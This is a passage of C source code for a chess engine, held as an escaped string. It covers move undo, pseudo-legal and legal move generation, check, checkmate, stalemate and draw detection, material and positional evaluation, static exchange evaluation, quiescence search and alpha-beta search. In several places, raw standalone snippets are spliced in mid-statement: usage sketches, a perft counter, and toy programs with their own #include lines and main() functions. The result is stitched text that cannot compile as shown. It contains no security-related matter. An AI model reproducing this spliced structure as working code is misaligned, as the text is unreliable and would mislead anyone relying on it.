list the size of the new list\n\n\t\t\tgame->moveListLen -= 1; // Make the list length one less\n\t\t} else { // return to initial game\n\t\t\tloadFen(&newPosition, game->positionHistory[0]); // Else there is no moves to undo\n\t\t\tmemcpy(&(game->position), &newPosition, sizeof(Position));\n\n\t\t\tgame->moveListLen = 0; // The list is size 0\n\t\t\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\t\t\tmemset(&game->positionHistory[1], 0, (MAX_PLYS_PER_GAME-1)*MAX_FEN_LEN*sizeof(char));\n\t\t}\n}\n\n// ======== MOVE GEN =========\n// ==== Makes a list of moves ====\nBitboard getMoves(Bitboard movingPiece, Position * position, char color) {\n\tint piece = position->board[bb2index(movingPiece)] & PIECE_MASK;\n\n\tswitch (piece) {\n\tcase PAWN:\n\t\treturn pawnMoves(movingPiece, position, color); // List pawn moves and info\n\tcase KNIGHT:\n\t\treturn knightMoves(movingPiece, position->board, color); // List knight moves and info\n\tcase BISHOP:\n\t\treturn bishopMoves(movingPiece, position->board, color); // List bishop moves and info\n\tcase ROOK:\n\t\treturn rookMoves(movingPiece, position->board, color); // List rook moves and info\n\tcase QUEEN:\n\t\treturn queenMoves(movingPiece, position->board, color); // List queen moves and info \n\tcase KING:\n\t\treturn kingMoves(movingPiece, position->board, color); // List king moves and info\n\t}\n\treturn 0;\n}\n\n// List of legal moves\nint pseudoLegalMoves(Move * moves, Position * position, char color) {\n\tint leavingSquare, arrivingSquare, moveCount = 0;\n\n\tfor (leavingSquare=0; leavingSquare<NUM_SQUARES; leavingSquare++) {\n\t\tint piece = position->board[leavingSquare]; // Get the position of the square the piece is leaving\n\n\t\tif (piece != EMPTY && (piece&COLOR_MASK) == color) { // Get the peices information and the colour of it\n\t\t\tBitboard targets = 
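/*
 * [Usage sketch, not part of this engine] updatePosition()/makeMove() above
 * apply a move by copying the position, moving the piece, then patching the
 * clocks, the en passant square and the castling rights. A sketch of how the
 * functions shown in this file fit together; it assumes loadFen() and
 * INITIAL_FEN behave as they are used elsewhere in this file.
 */
static void openingPush_sketch(void) {
	Position pos, next;
	loadFen(&pos, INITIAL_FEN);                                 /* standard start position */

	Move e2e4 = generateMove(str2index("e2"), str2index("e4"));
	updatePosition(&next, &pos, e2e4);

	/* next.toMove is now BLACK, and because e2-e4 is a double push,
	   next.epSquare holds the index of e3. */
}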
getMoves(index2bb(leavingSquare), position, color);\n\n\t\t\tfor (arrivingSquare=0; arrivingSquare<NUM_SQUARES; arrivingSquare++) {\n\t\t\t\tif (isSet(targets, arrivingSquare)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, arrivingSquare);\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif ( (piece&PIECE_MASK) == KING ) { // If the piece is a king\n\t\t\t\tif (canCastleKingside(position, color)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, leavingSquare+2);\n\t\t\t\t}\n\t\t\t\tif (canCastleQueenside(position, color)) {\n\t\t\t\t\tmoves[moveCount++] = generateMove(leavingSquare, leavingSquare-2);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn moveCount;\n}\n\n// ==== Get a list of possible attacks for each piece ==== \nBitboard getAttacks(Bitboard movingPiece, int board[], char color) {\n\tint piece = board[bb2index(movingPiece)] & PIECE_MASK;\n\n\tswitch (piece) {\n\tcase PAWN:\n\t\treturn pawnAttacks(movingPiece, board, color); // Get the pawns information\n\tcase KNIGHT:\n\t\treturn knightAttacks(movingPiece); // Get the knights information\n\tcase BISHOP:\n\t\treturn bishopAttacks(movingPiece, board, color); // Get the bishops information\n\tcase ROOK:\n\t\treturn rookAttacks(movingPiece, board, color); // Get the rooks information\n\tcase QUEEN:\n\t\treturn queenAttacks(movingPiece, board, color); // Get the queens information\n\tcase KING:\n\t\treturn kingAttacks(movingPiece); // Get the kings information\n\t}\n\treturn 0;\n}\n\n// ==== Get the number of attacks ====\nint countAttacks(Bitboard target, int board[], char color) {\n\tint i, attackCount = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color)\n\t\t\tif ( getAttacks(index2bb(i), board, color) & target )\n\t\t\t\tattackCount += 1; // Add one to the attack count\n\n\treturn attackCount;\n}\n\n// ==== Was the piece attacked ====\nBOOL isAttacked(Bitboard target, int board[], char color) {\n\tif (countAttacks(target, board, color) > 0) // Get the pieces attack information\n\t\treturn TRUE; // If it was attacked return true\n\telse\n\t\treturn FALSE; // If it wasn't attacked return false\n}\n\n// ==== Checks if it's check ====\nBOOL isCheck(int board[], char color) {\n \treturn isAttacked(getKing(board, color), board, opponent(color)); // Return if the king can be attacked?\n}\n\n// ==== Checks if the move is the legal ====\nBOOL isLegalMove(Position * position, Move move) {\n\tPosition newPosition;\n\tupdatePosition(&newPosition, position, move); // Gets selected position\n\tif ( isCheck(newPosition.board, position->toMove) ) // Did the user move the king into a spot where it will be attacked.\n\t\treturn FALSE;\n\treturn TRUE;\n}\n\n// ==== Returns how many legal moves there are ====\nint legalMoves(Move * legalMoves, Position * position, char color) {\n\tint i, legalCount = 0;\n\n\tMove pseudoMoves[MAX_BRANCHING_FACTOR];\n\tint pseudoCount = pseudoLegalMoves(pseudoMoves, position, color); // Get the number of pseudo legal moves\n\n\tfor (i=0; i<pseudoCount; i++) { \n\t\tif (isLegalMove(position, pseudoMoves[i])) { //For all of the moves, if the move is legal, increase the count by one\n\t\t\tlegalMoves[legalCount++] = pseudoMoves[i];\n\t\t}\n\t}\n\n\treturn legalCount;\n}\n\n// ==== Count of legal moves ====\nint legalMovesCount(Position * position, char color) {\n\tint i, legalCount = 0;\n\n\tMove pseudoMoves[MAX_BRANCHING_FACTOR];\n\tint pseudoCount = pseudoLegalMoves(pseudoMoves, position, color); // Get list of psuedo legal moves \n\n\tfor (i=0; i<pseudoCount; i++) 
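/*
 * [Validation sketch, not part of this engine] legalMoves() above filters
 * pseudo-legal moves by simulating each one and rejecting those that leave the
 * mover in check. A standard way to test such a generator is a perft count:
 * recursively count leaf positions to a fixed depth and compare against known
 * totals. This sketch only uses the legalMoves()/updatePosition() signatures
 * shown in this file; perft_sketch itself is made up for this example.
 */
static long perft_sketch(Position * position, int depth) {
	if (depth == 0)
		return 1;

	Move moves[MAX_BRANCHING_FACTOR];
	int moveCount = legalMoves(moves, position, position->toMove);

	long nodes = 0;
	int i;
	for (i=0; i<moveCount; i++) {
		Position next;
		updatePosition(&next, position, moves[i]);   /* simulate the move */
		nodes += perft_sketch(&next, depth - 1);
	}
	return nodes;
}
/* From the standard starting position, perft(1) is 20 and perft(2) is 400. */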
{\n\t\tif (isLegalMove(position, pseudoMoves[i])) { // If the pseudo-legal move is actually legal, increment the count\n\t\t\tlegalCount++;\n\t\t}\n\t}\n\n\treturn legalCount;\n}\n\n// ==== List the legal moves in static order ==== \nint staticOrderLegalMoves(Move * orderedLegalMoves, Position * position, char color) {\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint legalCount = legalMoves(moves, position, color); // Get all legal moves for this side\n\n\tPosition newPosition;\n\tNode nodes[legalCount], orderedNodes[legalCount];\n\n\tint i;\n\tfor (i=0; i<legalCount; i++) {\n\t\tupdatePosition(&newPosition, position, moves[i]); // Make the move\n\t\tnodes[i] = (Node) { .move = moves[i], .score = staticEvaluation(&newPosition) }; // Statically evaluate the resulting position\n\t}\n\n\tsortNodes(orderedNodes, nodes, legalCount, color); // Sort the nodes (moves) in the list\n\n\tfor (i=0; i<legalCount; i++) {\n\t\torderedLegalMoves[i] = orderedNodes[i].move; // Reorder the legal moves into a sorted list\n\t}\n\n\treturn legalCount;\n}\n\n// ==== Get a list of legal captures ====\nint legalCaptures(Move * legalCaptures, Position * position, char color) {\n\tint i, captureCount = 0;\n\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint legalCount = legalMoves(moves, position, color); // Get the number of legal moves\n\n\tfor (i=0; i<legalCount; i++) {\n\t\tint arrivingSquare = getTo(moves[i]); // Get the destination square of the move\n\t\tif ( index2bb(arrivingSquare) & getColoredPieces(position->board, opponent(color)) ) {\n\t\t\tlegalCaptures[captureCount++] = moves[i]; // If the destination holds an opponent's piece, record the move as a legal capture\n\t\t}\n\t}\n\n\treturn captureCount;\n}\n\n// ====== GAME CONTROL =======\n\n// ==== Determines if it is checkmate ====\nBOOL isCheckmate(Position * position) {\n\t// if is in check and has no legal moves\n\tif (isCheck(position->board, position->toMove) && legalMovesCount(position, position->toMove) == 0)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if it is a stalemate ====\nBOOL isStalemate(Position * position) {\n\t// if no legal moves but not in check\n\tif (!isCheck(position->board, position->toMove) && legalMovesCount(position, position->toMove) == 0)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if there is insufficient material (neither player can checkmate) ====\nBOOL hasInsufficientMaterial(int board[]) {\n\tint pieceCount = countBits(getOccupiedSquares(board));\n\n\tif ( pieceCount <= 3 ) {\n\t\tif ( pieceCount == 2 || getKnights(board) != 0 || getBishops(board) != 0 )\n\t\t\treturn TRUE;\n\t}\n\n\treturn FALSE;\n}\n\n// ==== Determines if it is the endgame ====\nBOOL isEndgame(int board[]) {\n\tif (countBits(getOccupiedSquares(board)) <= ENDGAME_PIECE_COUNT)\n\t\treturn TRUE;\n\treturn FALSE;\n}\n\n// ==== Determines if the move limit has been reached ====\nBOOL isOver75MovesRule(Position * position) {\n\tif (position->halfmoveClock >= 150)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Determines if the game has ended ====\nBOOL hasGameEnded(Position * position) {\n\t// checkmate, stalemate, insufficient material, or move limit reached\n\tif ( isCheckmate(position) ||\n\t\t isStalemate(position) ||\n\t\t hasInsufficientMaterial(position->board) ||\n\t\t isOver75MovesRule(position) )\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\n// ==== Prints the outcome of the game ====\nvoid printOutcome(Position * position) {\n\t// Black in checkmate\n\tif 
(isCheckmate(position) && position->toMove == BLACK)\n\t\tprintf(\"WHITE wins!\\n\");\n\t// White in checkmate\n\tif (isCheckmate(position) && position->toMove == WHITE)\n\t\tprintf(\"BLACK wins!\\n\");\n\t// Draw: Stalemate\n\tif (isStalemate(position))\n\t\tprintf(\"Draw by stalemate!\\n\");\n\t// Draw: Insufficient Material\n\tif (hasInsufficientMaterial(position->board))\n\t\tprintf(\"Draw by insufficient material!\\n\");\n\t// Draw: Move limit reached\n\tif ( isOver75MovesRule(position) )\n\t\tprintf(\"Draw by 75 move rule!\\n\");\n\tfflush(stdout);\n}\n\n// ========== EVAL ===========\n\n// ==== Returns the win score for specified color ====\nint winScore(char color) {\n\tif (color == WHITE)\n\t\treturn 10*PIECE_VALUES[KING];\n\tif (color == BLACK)\n\t\treturn -10*PIECE_VALUES[KING];\n\treturn 0;\n}\n\n// ==== Returns the material total for specified color ====\nint materialSum(int board[], char color) {\n\tint i, material = 0;\n\n\t// goes through board\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\t// if space is occupied by a piece of specified color\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color) {\n\t\t\t// add piece value to material\n\t\t\tmaterial += PIECE_VALUES[board[i]&PIECE_MASK];\n\t\t}\n\t}\n\n\treturn material;\n}\n\n// ==== Returns the difference of the colors' material sum ====\nint materialBalance(int board[]) {\n\treturn materialSum(board, WHITE) - materialSum(board, BLACK);\n}\n\n// ==== Returns positional bonus for specified color\nint positionalBonus(int board[], char color) {\n\tint bonus = 0;\n\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tint piece = board[i];\n\n\t\t// if space is occupied by piece of specified color\n\t\tif (piece != EMPTY && (piece&COLOR_MASK) == color) {\n\t\t\tint pieceType = piece&PIECE_MASK;\n\n\t\t\t// Switch statement to handle each piece and their corresponding bonuses\n\t\t\tswitch(pieceType) {\n\t\t\tcase PAWN:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += PAWN_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += PAWN_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\n\t\t\t\tif (isDoubledPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= DOUBLED_PAWN_PENALTY/2;\n\t\t\t\t}\n\t\t\t\tif (isPassedPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus += PASSED_PAWN_BONUS;\n\t\t\t\t}\n\n\t\t\t\tif (isIsolatedPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= ISOLATED_PAWN_PENALTY;\n\t\t\t\t} else if (isBackwardsPawn(index2bb(i), board)) {\n\t\t\t\t\tbonus -= BACKWARDS_PAWN_PENALTY;\n\t\t\t\t}\n\n\t\t\t\tbreak;\n\n\t\t\tcase KNIGHT:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += KNIGHT_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += KNIGHT_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase BISHOP:\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tbonus += BISHOP_BONUS[i];\n\t\t\t\t} else {\n\t\t\t\t\tbonus += BISHOP_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase ROOK:\n \t\tif (isOpenFile(index2bb(i), board)) {\n \t\t\tbonus += ROOK_OPEN_FILE_BONUS;\n \t\t} else if (isSemiOpenFile(index2bb(i), board)) {\n \t\t\tbonus += ROOK_SEMI_OPEN_FILE_BONUS;\n \t\t}\n\n\t\t\t\tif (color == WHITE) {\n\t\t\t\t\tif (index2bb(i) & RANK_7) {\n\t\t\t\t\t\tbonus += ROOK_ON_SEVENTH_BONUS;\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tif (index2bb(i) & RANK_2) {\n\t\t\t\t\t\tbonus += ROOK_ON_SEVENTH_BONUS;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tbreak;\n\n\t\t\tcase KING:\n\t\t\t\tif (isEndgame(board)) {\n\t\t\t\t\tif (color == WHITE) {\n\t\t\t\t\t\tbonus += KING_ENDGAME_BONUS[i];\n\t\t\t\t\t} else {\n\t\t\t\t\t\tbonus += 
KING_ENDGAME_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tif (color == WHITE) {\n\t\t\t\t\t\tbonus += KING_BONUS[i];\n\t\t\t\t\t} else {\n\t\t\t\t\t\tbonus += KING_BONUS[FLIP_VERTICAL[i]];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn bonus;\n}\n\n// ==== Returns the difference of each colors' positional bonus ====\nint positionalBalance(int board[]) {\n\treturn positionalBonus(board, WHITE) - positionalBonus(board, BLACK);\n}\n\n// ==== Returns the value of the position at the end of the game ==== \nint endNodeEvaluation(Position * position) {\n\t// If it is checkmate, return the winning score\n\tif (isCheckmate(position)) {\n\t\treturn winScore(opponent(position->toMove));\n\t}\n\t// If it is in stalemate or will likely be a stalemate, return 0\n\tif (isStalemate(position) || hasInsufficientMaterial(position->board) || isOver75MovesRule(position)) {\n\t\treturn 0;\n\t}\n\t// Else, return 0\n\treturn 0;\n}\n\n// ==== Returns the value of the current position ====\nint staticEvaluation(Position * position) {\n\t// If the game is over, end node evaluation\n\tif (hasGameEnded(position))\n\t\treturn endNodeEvaluation(position);\n\t// Else return a combination of the material and positional balances\n\t// to figure out who has the upper hand\n\telse\n\t\treturn materialBalance(position->board) + positionalBalance(position->board);\n}\n\n// ==== Returns count of moves that end in capture from position to target square ====\n// ==== Stores them in captures ====\nint getCaptureSequence(Move * captures, Position * position, int targetSquare) {\n\tMove allCaptures[MAX_BRANCHING_FACTOR], targetCaptures[MAX_ATTACKING_PIECES];\n\tint captureCount = legalCaptures(allCaptures, position, position->toMove);\t// Gets all legal captures from position\n\tint i, j, targetCount = 0;\n\n\t// For all legal captures\n\tfor (i=0; i<captureCount; i++) {\n\t\t// If the end position is the target square\n\t\tif ( getTo(allCaptures[i]) == targetSquare ) {\n\t\t\t// Add capture to target captures and increase target count\n\t\t\ttargetCaptures[targetCount++] = allCaptures[i];\n\t\t}\n\t}\n\n\tMove captureBuffer[targetCount];\n\n\t// Order the moves in order of increasing value\n\tBOOL sorted;\n\t// Insertion sort of targetCount\n\tfor (i=0; i<targetCount; i++) {\n\t\tsorted = FALSE;\n\t\t// Get integer representation of piece from targetcaptures[i]\n\t\tint piece = position->board[getFrom(targetCaptures[i])] & PIECE_MASK;\n\n\t\tfor (j=0; j<i; j++) {\n\t\t\t// Get integer representation of piece from captures[j]\n\t\t\tint sortedPiece = position->board[getFrom(captures[j])] & PIECE_MASK;\n\n\t\t\t// If the piece at target captures is less than the piece at captures\n\t\t\tif ( PIECE_VALUES[piece] < PIECE_VALUES[sortedPiece] ) {\n\t\t\t\t// Move captures[j] over 1 spot\n\t\t\t\tsorted = TRUE;\n\t\t\t\tmemcpy(captureBuffer, &captures[j], (i-j)*sizeof(Move));\n\t\t\t\tmemcpy(&captures[j+1], captureBuffer, (i-j)*sizeof(Move));\n\t\t\t\t// Move targetCaptures[i] to captures[j]\n\t\t\t\tcaptures[j] = targetCaptures[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\t// Else, insert at end of iteration\n\t\tif ( sorted == FALSE ) {\n\t\t\tcaptures[i] = targetCaptures[i];\n\t\t}\n\t}\n\n\treturn targetCount;\n}\n\n// Evaluates the long-term cost of taking a piece\n// Used for deciding if a trade is bad in the long term\nint staticExchangeEvaluation(Position * position, int targetSquare) {\n\tMove captures[MAX_ATTACKING_PIECES];\n\t// Get sorted list of possible captures\n\tint attackCount = 
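/*
 * Illustrative aside (standalone): getCaptureSequence() above insertion-sorts
 * the capturing pieces so the least valuable attacker is tried first.  The
 * same ordering on plain centipawn values:
 */
#include <stdio.h>

static void orderAttackersAscending(int values[], int count) {
	int i, j;
	for (i = 1; i < count; i++) {
		int v = values[i];
		for (j = i; j > 0 && values[j - 1] > v; j--)
			values[j] = values[j - 1];   /* shift larger values one slot up */
		values[j] = v;                   /* insert the attacker in order */
	}
}

int main(void) {
	int attackers[] = { 900, 100, 330, 100, 500 };   /* Q, P, B, P, R */
	int i, n = sizeof(attackers) / sizeof(attackers[0]);

	orderAttackersAscending(attackers, n);
	for (i = 0; i < n; i++)
		printf("%d ", attackers[i]);     /* prints: 100 100 330 500 900 */
	printf("\n");
	return 0;
}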
getCaptureSequence(captures, position, targetSquare);\n\tint value = 0;\n\n\t// If the amount of possible captures is greater than 0\n\tif ( attackCount > 0 ) {\n\t\tPosition newPosition;\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, captures[0]);\n\t\t// Get value of the captured piece\n\t\tint capturedPiece = position->board[targetSquare] & PIECE_MASK;\n\t\tint pieceValue = PIECE_VALUES[capturedPiece];\n\t\t// Get overall value by subtracting the capture evaluation of the updated position from the value of the capture\n\t\tvalue = pieceValue - staticExchangeEvaluation(&newPosition, targetSquare);\n\t}\n\n\treturn value>0?value:0;\n}\n\n// More extensive value evaluation, done by checking all possible captures after a move\n// and seeing if any of the captures will cause the move to be a poor trade\nint quiescenceEvaluation(Position * position) {\n\t// Evaluate current position's value statically\n\tint staticScore = staticEvaluation(position);\n\n\t// If the game is over in this position, return the current score\n\tif (hasGameEnded(position))\n\t\treturn staticScore;\n\n\t// Get number of possible captures, and fill captures with all possible captures\n\tMove captures[MAX_BRANCHING_FACTOR];\n\tint captureCount = legalCaptures(captures, position, position->toMove);\n\n\t// If there are no possible captures, return the static score\n\tif (captureCount == 0) {\n\t\treturn staticScore;\n\t} else {\n\t\tPosition newPosition;\n\t\tint i, bestScore = staticScore;\n\n\t\tfor (i=0; i<captureCount; i++) {\n\t\t\t// If the current position is a poor exchange, break the loop\n\t\t\tif (staticExchangeEvaluation(position, getTo(captures[i])) <= 0)\n\t\t\t\tbreak;\n\n\t\t\t// Simulate capture\n\t\t\tupdatePosition(&newPosition, position, captures[i]);\n\t\t\t// Recursively calculate value of this position\n\t\t\tint score = quiescenceEvaluation(&newPosition);\n\n\t\t\t// If score is better than the current best, update the best score\n\t\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\t\tbestScore = score;\n\t\t\t}\n\t\t}\n\n\t\treturn bestScore;\n\t}\n}\n\n// ==============================================================\n// \t\t\t\t\t========= SEARCH ==========\n// ==============================================================\n\n// ==== Perfroms a static search ====\nNode staticSearch(Position * position) {\n\t// Initialize best score to max values before iteration\n\tint bestScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tMove bestMove = 0;\n\n\t// Create array of possible moves\n\tMove moves[MAX_BRANCHING_FACTOR];\n\t// Finds the count of possible moves and fills move array with all possible moves\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t//For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t// Calculate the value of the board after the move\n\t\tint score = staticEvaluation(&newPosition);\n\n\t\t// If move wins the game, return the move\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t//Otherwise, if the move is the best move so far, update the best move\n\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\tbestScore = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t}\n\n\treturn (Node) { .move = 
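/*
 * Illustrative aside (standalone): the recursion in staticExchangeEvaluation()
 * above, reduced to plain numbers.  victims[i] is the value standing on the
 * target square before the i-th capture: the original occupant first, then
 * each piece that recaptures.  The "value > 0 ? value : 0" clamp lets either
 * side decline to continue a losing exchange.
 */
#include <stdio.h>

static int exchangeValue(const int victims[], int count) {
	int value;
	if (count == 0)
		return 0;
	/* Gain from capturing now, minus what the opponent recoups by recapturing. */
	value = victims[0] - exchangeValue(victims + 1, count - 1);
	return value > 0 ? value : 0;        /* never forced into a losing exchange */
}

int main(void) {
	/* A pawn takes a knight (320); a bishop may recapture the pawn (100); our
	 * rook could then take the bishop (330) but would be lost to a defender
	 * (500), so the sequence stops after the first recapture. */
	int victims[] = { 320, 100, 330, 500 };
	printf("exchange value = %d\n", exchangeValue(victims, 4));   /* prints 220 */
	return 0;
}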
bestMove, .score = bestScore };\n}\n\n// Search utilizing the quiescence evaluation to get a more accurate value estimate\nNode quiescenceSearch(Position * position) {\n\t// Initialize best score to max values before iteration\n\tint bestScore = position->toMove==WHITE?INT32_MIN:INT32_MAX;\n\tMove bestMove = 0;\n\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, position, position->toMove);\t// Gets legal moves\n\n\tPosition newPosition;\n\tint i;\n\t// Create array of possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t// Calculate the value of the board after the move, checking to see\n\t\t// if the value will be invalidated by an opponents move\n\t\tint score = quiescenceEvaluation(&newPosition);\n\n\t\t// If move wins the game, return the move\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t//Otherwise, if the move is the best move so far, update the best move\n\t\tif ( (position->toMove == WHITE && score > bestScore) ||\n\t\t\t (position->toMove == BLACK && score < bestScore) ) {\n\t\t\tbestScore = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = bestScore };\n}\n\n// Basic recursive search, which evaluates each position recursively up to a given depth\nNode alphaBeta(Position * position, char depth, int alpha, int beta) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the static evaluation of the position\n\t// As static evaluation is naturally an evaluation of depth 1\n\tif (depth == 1)\n\t\treturn staticSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\t// Find list of possible moves, ordered by the move's value\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = staticOrderLegalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = alphaBeta(&newPosition, depth-1, alpha, beta).score;\n\n\t\t// If the returned score wins the game, return that node\t\n\t\tif (score == winScore(position->toMove)) {\n\t\t\treturn (Node) { .move = moves[i], .score = score };\n\t\t}\n\n\t\t// Otherwise, update the best move and upper/lower bound (alpha/beta)\n\t\tif (position->toMove == WHITE && score > alpha) {\n\t\t\talpha = score;\n\t\t\tbestMove = moves[i];\n\t\t} else if (position->toMove == BLACK && score < beta) {\n\t\t\tbeta = score;\n\t\t\tbestMove = moves[i];\n\t\t}\n\t\t// If the lower bound exceeds the upper bound, terminate the loop\n\t\tif (alpha > beta) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn (Node) { .move = bestMove, .score = position->toMove==WHITE?alpha:beta };\n}\n\n// Generates sorted list of best possible moves for a certain position using alphaBeta\nint alphaBetaNodes(Node * sortedNodes, Position * position, char depth) {\n\tNode 
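/*
 * Illustrative aside (standalone): the alpha/beta bookkeeping of alphaBeta()
 * above on a toy tree.  Leaves of a perfect binary tree are stored left to
 * right in leaves[]; White maximizes on even plies and Black minimizes on odd
 * plies, mirroring the toMove test above.  The engine cuts off only when the
 * window is strictly crossed (alpha > beta); the more common alpha >= beta
 * cutoff used here prunes slightly earlier and returns the same root value.
 */
#include <stdio.h>

static int toyAlphaBeta(const int leaves[], int node, int depth, int ply,
                        int alpha, int beta) {
	int child;

	if (depth == 0)
		return leaves[node];

	for (child = 0; child < 2; child++) {
		int score = toyAlphaBeta(leaves, 2 * node + child, depth - 1, ply + 1,
		                         alpha, beta);
		if (ply % 2 == 0 && score > alpha)
			alpha = score;                    /* White raises the lower bound */
		else if (ply % 2 == 1 && score < beta)
			beta = score;                     /* Black lowers the upper bound */
		if (alpha >= beta)
			break;                            /* window closed: prune siblings */
	}
	return ply % 2 == 0 ? alpha : beta;
}

int main(void) {
	int leaves[] = { 3, 5, 6, 9, 1, 2, 0, -1 };   /* depth-3 tree, 8 leaves */
	printf("best score = %d\n", toyAlphaBeta(leaves, 0, 3, 0, -1000, 1000));   /* 5 */
	return 0;
}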
nodes[MAX_BRANCHING_FACTOR];\n\tMove moves[MAX_BRANCHING_FACTOR];\n\t// Get list of legal moves\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, moves[i]);\n\t\t\n\t\t// Add move to list of nodes\n\t\tnodes[i].move = moves[i];\n\t\t// Use alphaBeta to calculate the score of the move, and add to list of nodes\n\t\tnodes[i].score = depth>1?alphaBeta(&newPosition, depth-1, INT32_MIN, INT32_MAX).score:staticEvaluation(&newPosition);\n\t}\n\n\t// Sort list of nodes into sortedNodes\n\tsortNodes(sortedNodes, nodes, moveCount, position->toMove);\n\n\treturn moveCount;\n}\n\n// A version of alphaBeta that uses a list of nodes sorted by value using alphaBeta (why?)\n// It also uses quiescence search to confirm the validity of the move\nNode iterativeDeepeningAlphaBeta(Position * position, char depth, int alpha, int beta, BOOL verbose) {\n\t// If the game has ended after this move, return\n\tif (hasGameEnded(position))\n\t\treturn (Node) { .score = endNodeEvaluation(position) };\n\n\t// If the depth has reached 1, then return the quiescence evaluation of the position\n\tif (depth == 1)\n\t\treturn quiescenceSearch(position);\n//\t\treturn staticSearch(position);\n\n\t// Shortcut check to see if a simple 1-depth search will yield a winning move\n\tNode staticNode = staticSearch(position);\n\tif (staticNode.score == winScore(position->toMove))\n\t\treturn staticNode;\n\t// Otherwise, proceed with the recursive search\n\n\tMove bestMove = 0;\n\n\tif (verbose) {\n\t\tprintf(\"Ordering moves...\\n\");\n\t\tfflush(stdout);\n\t}\n\n\t// Find list of possible moves, ordered by the move's value using alphaBeta to calculate the score\n\tNode nodes[MAX_BRANCHING_FACTOR];\n\tint moveCount = alphaBetaNodes(nodes, position, depth-1);\n\n\tPosition newPosition;\n\tint i;\n\t// For all possible moves\n\tfor (i=0; i<moveCount; i++) {\n\t\t// Simulate move\n\t\tupdatePosition(&newPosition, position, nodes[i].move);\n\n\t\tif (verbose) {\n\t\t\tprintf(\"(Move %2d/%d) \", i+1, moveCount);\n\t\t\tprintFullMove(nodes[i].move, position->board);\n\t\t\tprintf(\" = \");\n\t\t\tfflush(stdout);\n\t\t}\n\t\t// Evaluate node's score recursively \n\t\t// (Makes move, then simulates making more moves after that move, and returns best score)\n\t\tint score = iterativeDeepeningAlphaBeta(&newPosition, depth-1, alpha, beta, FALSE).score;\n\n\t\tif (verbose) {\n\t\t\tprintf(\"%.2f\\n\", score/100.0);\n\t\t\tfflush(stdout);\n\t\t}\n\n\t\t// If the returned score wins the game, return that node\n\t\tif (score == 